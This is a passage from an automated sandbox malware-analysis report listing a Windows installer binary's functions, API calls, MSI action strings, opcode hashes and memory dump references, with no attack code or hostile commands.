                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2296764815-0
                                                                                                                                                                        • Opcode ID: 992387706f3a10b5ba91e87584279e5adea6b02249430d60c077ec9e6a79fa26
                                                                                                                                                                        • Instruction ID: 1b530ed9daa89a37b66cd93470c80b96ebbd8b1ae3fbc9b927b24c96b169a7a3
                                                                                                                                                                        • Opcode Fuzzy Hash: 992387706f3a10b5ba91e87584279e5adea6b02249430d60c077ec9e6a79fa26
                                                                                                                                                                        • Instruction Fuzzy Hash: D30184F1904744EFDB14EB98EC4AB5877A4EB08721F10437BE626A37D0D735AA048A22
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D997AF Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,00D98004,00000001,00000364,?,00000002,000000FF,?,00D89D85,00000000,00D95FF3,00E8EBCC,?), ref: 00D997F0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: bb411301cd99493e07340aabe41f8ef8149295bb5d6597344ea3af18d83aac74
                                                                                                                                                                        • Instruction ID: 1f3e29f67023551bbcb0243adcd4059dba98b23f95d59d02c71ef09ae315ece4
                                                                                                                                                                        • Opcode Fuzzy Hash: bb411301cd99493e07340aabe41f8ef8149295bb5d6597344ea3af18d83aac74
                                                                                                                                                                        • Instruction Fuzzy Hash: 80F0E93161452577EF212EAE9C55B5BBB49DF41760B1C812AEC05A71D4DE21D80046F0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD1DA0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
                                                                                                                                                                          • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CD1E16
                                                                                                                                                                          • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
                                                                                                                                                                          • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
                                                                                                                                                                          • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2296764815-0
                                                                                                                                                                        • Opcode ID: 87292a6a5fb8b82c0313553fb336f645a65fddc06bac46dc346eab4399da5f2b
                                                                                                                                                                        • Instruction ID: 07023e10d60aea5a2b3d30db83aa5b68e81442f96c3e0a85f7996b287da57595
                                                                                                                                                                        • Opcode Fuzzy Hash: 87292a6a5fb8b82c0313553fb336f645a65fddc06bac46dc346eab4399da5f2b
                                                                                                                                                                        • Instruction Fuzzy Hash: 02018FB1B44644EBDB20EB58D906B0973A4F705B30F140A6BEE26A77C1E7346A048761
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D0CBD0 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,1FC3D414,00000000,?,?,00000000,00DF487E,000000FF,?,80004005), ref: 00D0CC58
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                                                        • Opcode ID: e4d7baa64b4b23d66458da34df3317255f3c8f9be59fe668330756a4d309b898
                                                                                                                                                                        • Instruction ID: 113fd46a915f47a48d9c8ad7ef904749c8c65fa720e9de2ecfeaab6f18887847
                                                                                                                                                                        • Opcode Fuzzy Hash: e4d7baa64b4b23d66458da34df3317255f3c8f9be59fe668330756a4d309b898
                                                                                                                                                                        • Instruction Fuzzy Hash: 07F0AF71600618BFDB10CF19CC44FAB77ACEB09724F048319F929E72D0D7B0AD048AA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D98247 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00D95FF3,?,00D9A198,?,00000000,?,00D89D85,00000000,00D95FF3,00E8EBCC,?,00E8EBC8,?,00D95DED), ref: 00D98279
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: ff76a25e5103c906cb449ea748c9cd92279501ce17c9a780191f0f262bbd27df
                                                                                                                                                                        • Instruction ID: b41a2ab1fb301814e4c85536dc78e5ee5e0e3beb2dd2c5aa49123790ea08c587
                                                                                                                                                                        • Opcode Fuzzy Hash: ff76a25e5103c906cb449ea748c9cd92279501ce17c9a780191f0f262bbd27df
                                                                                                                                                                        • Instruction Fuzzy Hash: 37E0ED31540E206AEF212766AD04B6E3658DB83BA0F2C4221EC45A30D0EF20DC00A6B8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D95F5B Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 431132790-0
                                                                                                                                                                        • Opcode ID: b471d721e6628c85995a646bf172badbea23e17c9d047550f4f344b244667eb0
                                                                                                                                                                        • Instruction ID: 483f3a6750ad9f88131a51a23e6ec464879eec94083ff6d7a0e8c2921a62f149
                                                                                                                                                                        • Opcode Fuzzy Hash: b471d721e6628c85995a646bf172badbea23e17c9d047550f4f344b244667eb0
                                                                                                                                                                        • Instruction Fuzzy Hash: D7E075B6C0060E9EDB41EFD4C552AEFBBB8EB08300F504126E245E6141EA7497898FB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00BB4772 Relevance: 145.9, Strings: 115, Instructions: 2113COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 100$10000$100000$12000$120000$1500$15000$1500000$1800$2000$20000$200000$3000$30000$3000000$500$5000$6000$8000$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$BindImage$Complus$Component_$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature_$File$FileSize$Font$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$Location$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Patch$PatchFiles$PatchSize$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveShortcuts$SelfReg$SelfRegModules$ServiceControl$ServiceInstall$Shortcut$StartServices$TypeLib$UnregisterClassInfo$UnregisterExtensionInfo$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$~
                                                                                                                                                                        • API String ID: 0-2578128725
                                                                                                                                                                        • Opcode ID: 2d6254474b0698ff040946f211681bc712be4a73c77b06222b7fc2a8de499c2f
                                                                                                                                                                        • Instruction ID: bc8121a148369322779d3756cba7ccc6ebf9a50516835ac61861cfbbd0df3af2
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d6254474b0698ff040946f211681bc712be4a73c77b06222b7fc2a8de499c2f
                                                                                                                                                                        • Instruction Fuzzy Hash: 6423E760E45394AADB10EBB55D1B7AD3B915F93704F1867AAF2513B2E2CBF00684C3D2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB2EA0 Relevance: 49.9, Strings: 39, Instructions: 1105COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 12000$15000$2000$3000$30000$800$8000$AppSearch$Complus$Component$Component_$CostFinalize$CostInitialize$Feature$Feature_$File$FileCost$Font$InstallValidate$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$ProcessComponents$PublishComponent$Registry$RemoveExistingProducts$RemoveODBC$RemoveRegistry$RemoveRegistryValues$SelfReg$SelfUnregModules$ServiceControl$StopServices$UnpublishComponents$UnpublishFeatures$UnregisterComPlus$UnregisterFonts$u
                                                                                                                                                                        • API String ID: 0-3127294129
                                                                                                                                                                        • Opcode ID: 5857606241971e7e43755d9620cb9a0ed37a07070815482f06678adba4a9f046
                                                                                                                                                                        • Instruction ID: 963761897d28bb304d0950e7fbe7fdcbe6753b8a8e711afe7f6bb6608fba5c9f
                                                                                                                                                                        • Opcode Fuzzy Hash: 5857606241971e7e43755d9620cb9a0ed37a07070815482f06678adba4a9f046
                                                                                                                                                                        • Instruction Fuzzy Hash: 75C29460E553849EF740DB6ADD4A7E67BA1AB96308F24524FE1043A2E3DBF512CCC781
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDC363 Relevance: 44.8, APIs: 14, Strings: 11, Instructions: 1036memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC38B
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC3BC
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC415
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC4C4
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC608
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00BDC619
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC663
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC68C
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BDC697
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC7A5
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00BDC7B2
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC7FA
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC822
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BDC82C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClearVariant$String$AllocFree
                                                                                                                                                                        • String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
                                                                                                                                                                        • API String ID: 1305860026-3153392536
                                                                                                                                                                        • Opcode ID: 6fcdc5e825ef34c9154f67a0ef64daff8e4c0c5bcae93015088ab44104d219ab
                                                                                                                                                                        • Instruction ID: df564c9c1b92e43ba244f072ff20761486fdb312726e2638a63c715b538783fe
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fcdc5e825ef34c9154f67a0ef64daff8e4c0c5bcae93015088ab44104d219ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E928B71D102499BCB14CFA8CC85BEEBBB4FF48314F20825AE455B7391EB74AA85CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BEB720 Relevance: 39.6, APIs: 14, Strings: 8, Instructions: 1082stringthreadsleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?,?, ?(-|/)+q,00E17BBE), ref: 00BEBAEE
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?,?, ?(-|/)+q,00E17BBE), ref: 00BEBC6E
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BEBE2B
                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 00BEB827
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?, ?(-|/)+q,00E17BBE), ref: 00BEC183
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC1EF
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC1F6
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC1FD
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC213
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BEC3FE
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC50F
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC516
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC51D
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC524
                                                                                                                                                                          • Part of subcall function 00BD11B0: FindClose.KERNEL32(00000000,00000000,?,?,?,00CDD167), ref: 00BD12EF
                                                                                                                                                                          • Part of subcall function 00BD11B0: PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 00BD13A7
                                                                                                                                                                          • Part of subcall function 00CCFDA0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,1FC3D414,?,00000000), ref: 00CCFDEB
                                                                                                                                                                          • Part of subcall function 00CCFDA0: GetLastError.KERNEL32(?,00000000), ref: 00CCFDF5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Cpp_errorThrow_std::_$CurrentInit_thread_footerThreadlstrcmpi$CloseErrorFindFormatHeapInitLastMessagePathProcessSleepstd::locale::_
                                                                                                                                                                        • String ID: ?(-|/)+q$($Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
                                                                                                                                                                        • API String ID: 3689723087-3482523422
                                                                                                                                                                        • Opcode ID: 2dac852a4f8019e27776d88b622d809c0598ea214c4a7e473355f55501dc25a1
                                                                                                                                                                        • Instruction ID: 5712a6ee868aa9f6d44eb90615d6d7a52da546996839bbf8df2a10a06317230a
                                                                                                                                                                        • Opcode Fuzzy Hash: 2dac852a4f8019e27776d88b622d809c0598ea214c4a7e473355f55501dc25a1
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A92AF31D00258DFDB24DFA9CC45BEEBBB1EF45314F248299E415B7292EB706A85CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD11B0 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 668fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindClose.KERNEL32(00000000,00000000,?,?,?,00CDD167), ref: 00BD12EF
                                                                                                                                                                        • PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 00BD13A7
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,00000000,*.*,00000000), ref: 00BD14FC
                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD1516
                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,?,00000000), ref: 00BD1549
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00BD15B8
                                                                                                                                                                        • SetLastError.KERNEL32(0000007B), ref: 00BD15C6
                                                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00BD161C
                                                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00BD163C
                                                                                                                                                                        • PathIsUNCW.SHLWAPI(*.*,?,1FC3D414), ref: 00BD17D5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$Find$CloseFullName_wcsrchr$ErrorFileFirstLast
                                                                                                                                                                        • String ID: *.*$\\?\$\\?\UNC\
                                                                                                                                                                        • API String ID: 1241272779-1700010636
                                                                                                                                                                        • Opcode ID: 8c93d3ffb126bffe134411186b134cafb9611119a3d59e34e735d07eaf6de90c
                                                                                                                                                                        • Instruction ID: 35e4e4e502113f91b97d0f6f0bf117b6fb492c992b95e627c0b427433749d721
